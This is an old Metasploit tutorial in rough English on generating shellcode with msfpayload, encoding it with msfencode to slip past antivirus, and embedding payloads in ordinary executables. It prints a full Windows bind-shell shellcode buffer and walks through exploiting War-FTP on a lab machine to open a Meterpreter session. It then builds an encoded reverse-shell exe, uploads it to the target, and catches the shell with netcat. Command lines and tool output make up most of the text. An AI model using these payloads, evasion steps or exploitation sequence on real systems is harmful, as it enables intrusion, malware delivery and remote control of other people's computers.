GLIMPES OF MSFPAYLOAD AND MSFENCODE
AND
HOW TO IMPLEMENT
Msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.
This tool has many different options and variables available to it, but they may not all be fully realized given the limited output in the help banner.
root@bt:~# msfpayload -h Usage: /opt/framework/msf3/msfpayload [] [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar> OPTIONS: -h Help banner -l List available payloads
How powerful this tool can be is fully seen when showing the vast number of different types of shellcode that are available to be customized for your specific exploit:
root@bt:~# msfpayload -l Framework Payloads (238 total) ============================== Name Description ---- ----------- aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell aix/ppc/shell_find_port Spawn a shell on an established connection aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs) aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell bsd/sparc/shell_bind_tcp Listen for a connection and spawn a command shell bsd/sparc/shell_reverse_tcp Connect back to attacker and spawn a command shell bsd/x86/exec Execute an arbitrary command bsd/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service bsd/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service bsd/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) bsd/x86/shell/find_tag Use an established connection, Spawn a command shell (staged) bsd/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) bsd/x86/shell_bind_tcp Listen for a connection and spawn a command shell bsd/x86/shell_find_port Spawn a shell on an established connection bsd/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe) bsd/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell bsdi/x86/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) bsdi/x86/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged) bsdi/x86/shell_bind_tcp Listen for a connection and spawn a command shell bsdi/x86/shell_find_port Spawn a shell on an established connection bsdi/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell cmd/unix/bind_inetd Listen for a connection and spawn a command shell (persistent) cmd/unix/bind_netcat Listen for a connection and spawn a command shell via netcat cmd/unix/bind_netcat_ipv6 Listen for a connection and spawn a command shell via netcat cmd/unix/bind_perl Listen for a connection and spawn a command shell via perl cmd/unix/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl cmd/unix/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/unix/bind_ruby_ipv6 Continually listen for a connection and spawn a command shell via Ruby cmd/unix/generic Executes the supplied command cmd/unix/interact Interacts with a shell on an established socket connection cmd/unix/reverse Creates an interactive shell through two inbound connections cmd/unix/reverse_bash Creates an interactive shell via bash's builtin /dev/tcp. This will not work on most Debian-based Linux distributions (including Ubuntu) because they compile bash without the /dev/tcp feature. cmd/unix/reverse_netcat Creates an interactive shell via netcat cmd/unix/reverse_perl Creates an interactive shell via perl cmd/unix/reverse_ruby Connect back and create a command shell via Ruby cmd/windows/adduser Create a new user and add them to local administration group cmd/windows/bind_perl Listen for a connection and spawn a command shell via perl (persistent) cmd/windows/bind_perl_ipv6 Listen for a connection and spawn a command shell via perl (persistent) cmd/windows/bind_ruby Continually listen for a connection and spawn a command shell via Ruby cmd/windows/download_eval_vbs Downloads a file from an HTTP(S) URL and executes it as a vbs script. Use it to stage a vbs encoded payload from a short command line. cmd/windows/download_exec_vbs Download an EXE from an HTTP(S) URL and execute it cmd/windows/reverse_perl Creates an interactive shell via perl cmd/windows/reverse_ruby Connect back and create a command shell via Ruby generic/custom Use custom string or file as payload. Set either PAYLOADFILE or PAYLOADSTR. generic/debug_trap Generate a debug trap in the target process generic/shell_bind_tcp Listen for a connection and spawn a command shell generic/shell_reverse_tcp Connect back to attacker and spawn a command shell generic/tight_loop Generate a tight loop in the target process java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell java/meterpreter/bind_tcp Listen for a connection, Run a meterpreter server in Java java/meterpreter/reverse_http Tunnel communication over HTTP, Run a meterpreter server in Java java/meterpreter/reverse_https Tunnel communication over HTTPS, Run a meterpreter server in Java java/meterpreter/reverse_tcp Connect back stager, Run a meterpreter server in Java java/shell/bind_tcp Listen for a connection, Spawn a piped command shell
(cmd.exe on Windows, /bin/sh everywhere else) java/shell/reverse_tcp Connect back stager, Spawn a piped command shell
(cmd.exe on Windows, /bin/sh everywhere else) java/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/armle/adduser Create a new user with UID 0 linux/armle/exec Execute an arbitrary command linux/armle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsbe/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/mipsle/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc/shell_find_port Spawn a shell on an established connection linux/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/ppc64/shell_bind_tcp Listen for a connection and spawn a command shell linux/ppc64/shell_find_port Spawn a shell on an established connection linux/ppc64/shell_reverse_tcp Connect back to attacker and spawn a command shell linux/x64/exec Execute an arbitrary command linux/x64/shell/bind_tcp Listen for a connection, Spawn a command shell (staged) linux/x64/shell/reverse_tcp Connect back to the attacker, Spawn a command shell (staged)
Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating. In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload.
root@bt:~# msfpayload windows/shell_bind_tcp O Name: Windows Command Shell, Bind TCP Inline Module: payload/windows/shell_bind_tcp Version: 8642 Platform: Windows Arch: x86 Needs Admin: No Total size: 341 Rank: Normal Provided by: vlad902 sf Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address Description: Listen for a connection and spawn a command shell
As we can see from the output, we can configure three different options with this specific payload, if they are required, if they come with any default settings, and a short description:
- EXITFUNC
- Required
- Default setting: process
- LPORT
- Required
- Default setting: 4444
- RHOST
- Not required
- No default setting
Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O Name: Windows Command Shell, Bind TCP Inline Module: payload/windows/shell_bind_tcp Version: 8642 Platform: Windows Arch: x86 Needs Admin: No Total size: 341 Rank: Normal Provided by: vlad902 sf Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique: seh, thread, process, none LPORT 1234 yes The listen port RHOST no The target address Description: Listen for a connection and spawn a command shell
Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C:
root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C /* * windows/shell_bind_tcp - 341 bytes * http://www.metasploit.com * VERBOSE=false, LPORT=1234, RHOST=, EXITFUNC=seh, * InitialAutoRunScript=, AutoRunScript= */ unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" "\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68" "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
Now we have our fully customized shellcode to be used in any exploit!
Msfencode is another tool included in the
Metasploit framwork and is used to encode an exploit or payload.
In many cases, basic exploit can be
detected by virus scanners, but by encoding them we have a better
ahance of bypassing their detection routines and ensuring that our
payload gets executed on the target system. In addition, recent
updates to msfencode also allow us to encode a payload into an
existing excutable! This means you can take a normal aplication.
Encode it with our payload, and end up with an encoded cofy of the
excutable containing the payload and ready to run on the target
system. This goes very well with the encepts that we've talked about
with custom malware where an actual usable program is sent to the
target but our malware is sent with it.
One of the easiest ways to use
msfencode is to just directly pipe the output from msfpayload to it.
After you determine which encoding method you wan to use, you then
determine which format you want to reccive the result in similar to
root@bt:~#
msfencode -l
Framework
Encoders
==================
Name
Rank Description
----
---- -----------
cmd/generic_sh
good Generic Shell Variable Substitution Command
Encoder
cmd/ifs
low Generic ${IFS} Substitution Command
Encoder
cmd/printf_php_mq
manual printf(1) via PHP magic_quotes Utility Command
Encoder
generic/none
normal The "none" Encoder
mipsbe/longxor
normal XOR Encoder
mipsle/longxor
normal XOR Encoder
php/base64
great PHP Base64 encoder
ppc/longxor
normal PPC LongXOR Encoder
ppc/longxor_tag
normal PPC LongXOR Encoder
sparc/longxor_tag
normal SPARC DWORD XOR Encoder
x64/xor
normal XOR Encoder
x86/alpha_mixed
low Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper
low Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower
manual Avoid UTF8/tolower
x86/call4_dword_xor
normal Call+4 Dword XOR Encoder
x86/context_cpuid
manual CPUID-based Context Keyed Payload Encoder
x86/context_stat
manual stat(2)-based Context Keyed Payload Encoder
x86/context_time
manual time(2)-based Context Keyed Payload Encoder
x86/countdown
normal Single-byte XOR Countdown Encoder
x86/fnstenv_mov
normal Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive
normal Jump/Call XOR Additive Feedback Encoder
x86/nonalpha
low Non-Alpha Encoder
x86/nonupper
low Non-Upper Encoder
x86/shikata_ga_nai
excellent Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit
manual Single Static Bit
x86/unicode_mixed
manual Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper
manual Alpha2 Alphanumeric Unicode Uppercase Encoder
root@bt:~#
msfencode -h
Usage:
/opt/framework/msf3/msfencode <options>
OPTIONS:
-a
<opt> The architecture to encode as
-b
<opt> The list of characters to avoid: '\x00\xff'
-c
<opt> The number of times to encode the data
-d
<opt> Specify the directory in which to look for EXE templates
-e
<opt> The encoder to use
-h
Help banner
-i
<opt> Encode the contents of the supplied file path
-k
Keep template working; run payload in new thread (use with -x)
-l
List available encoders
-m
<opt> Specifies an additional module search path
-n
Dump encoder information
-o
<opt> The output file
-p
<opt> The platform to encode for
-s
<opt> The maximum size of the encoded data
-t
<opt> The output format:
raw,ruby,rb,perl,pl,bash,sh,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vba-exe,vbs,loop-vbs,asp,war
-v
Increase verbosity
-x
<opt> Specify an alternate executable template
output :
Encodes the provided data using the
options specified in the command line in the chosen output format.
typical output :
root@bt:~#
msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R
| msfencode -e x86/shikata_ga_nai -t exe >
/pentest/exploits/ardy.exe
IMPLEMENT
our target here is the war-Ftp and you open Msfconsole.
and you can just follow like this.
root@bt:~#
msfconsole
_
_
/
\ / \ __ _ __ /_/ __
|
|\ / | _____ \ \ ___ _____ | | / \ _ \ \
|
| \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
|_|
| | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
|/
|____/ \___\/ /\ \___/ \/ \__| |_\ \___\
=[
metasploit v4.2.0-dev [core:4.2 api:1.0]
+
-- --=[ 798 exploits - 435 auxiliary - 133 post
+
-- --=[ 246 payloads - 27 encoders - 8 nops
=[
svn r14682 updated 25 days ago (2012.02.03)
Warning:
This copy of the Metasploit Framework was last updated 25 days ago.
We
recommend that you update the framework at least every other day.
For
information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf
> use exploit/windows/ftp/warftpd_165_user
msf
exploit(warftpd_165_user) > show options
Module
options (exploit/windows/ftp/warftpd_165_user):
Name
Current Setting Required Description
----
--------------- -------- -----------
FTPPASS
mozilla@example.com no The password for the specified
username
FTPUSER
anonymous no The username to authenticate as
RHOST
yes The target address
RPORT
21 yes The target port
msf
exploit(warftpd_165_user) > set RHOST 192.168.56.101
RHOST
=> 192.168.56.101
msf
exploit(warftpd_165_user) > show targets
Exploit
targets:
Id
Name
--
----
0
Windows 2000 SP0-SP4 English
1
Windows XP SP0-SP1 English
2
Windows XP SP2 English
3
Windows XP SP3 English
msf
exploit(warftpd_165_user) > set target 3
target
=> 3
msf
exploit(warftpd_165_user) > exploit
[*]
Started reverse handler on 192.168.56.1:4444
[*]
Trying target Windows XP SP3 English...
[*]
Sending stage (752128 bytes) to 192.168.56.101
[*]
Meterpreter session 1 opened (192.168.56.1:4444 ->
192.168.56.101:1031) at 2012-02-28 00:48:07 +0700
meterpreter
>
after entering meterpreter then we will make an extended file .exe with the command:
root@bt:~#
msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R
| msfencode -e x86/shikata_ga_nai -t exe >
/pentest/exploits/ardy.exe
windows/shell_reverse_tcp --> This is the payload that we use and not just this payload, but one which we will use this
msfencode -e x86/shikata_ga_nai -t --> This is for the encoder of the payload that we're going to use because without it we can not know the bad character.
after so we will upload the file ftp-war to the target is running win xp , by typing commands on the msfconsole.
meterpreter > upload /pentest/exploits/ardy.exe C:\\
after uploaded we started listening to backtrack from the console command:
root@bt:~# nc -l -p 4444
then we run the file that had been uploaded into the win xp so will result in sbagai the following:
root@bt:~#
nc -l -p 4444
Microsoft
Windows XP [Version 5.1.2600]
(C)
Copyright 1985-2001 Microsoft Corp.
C:\>
after that good luck.....!!!!!!
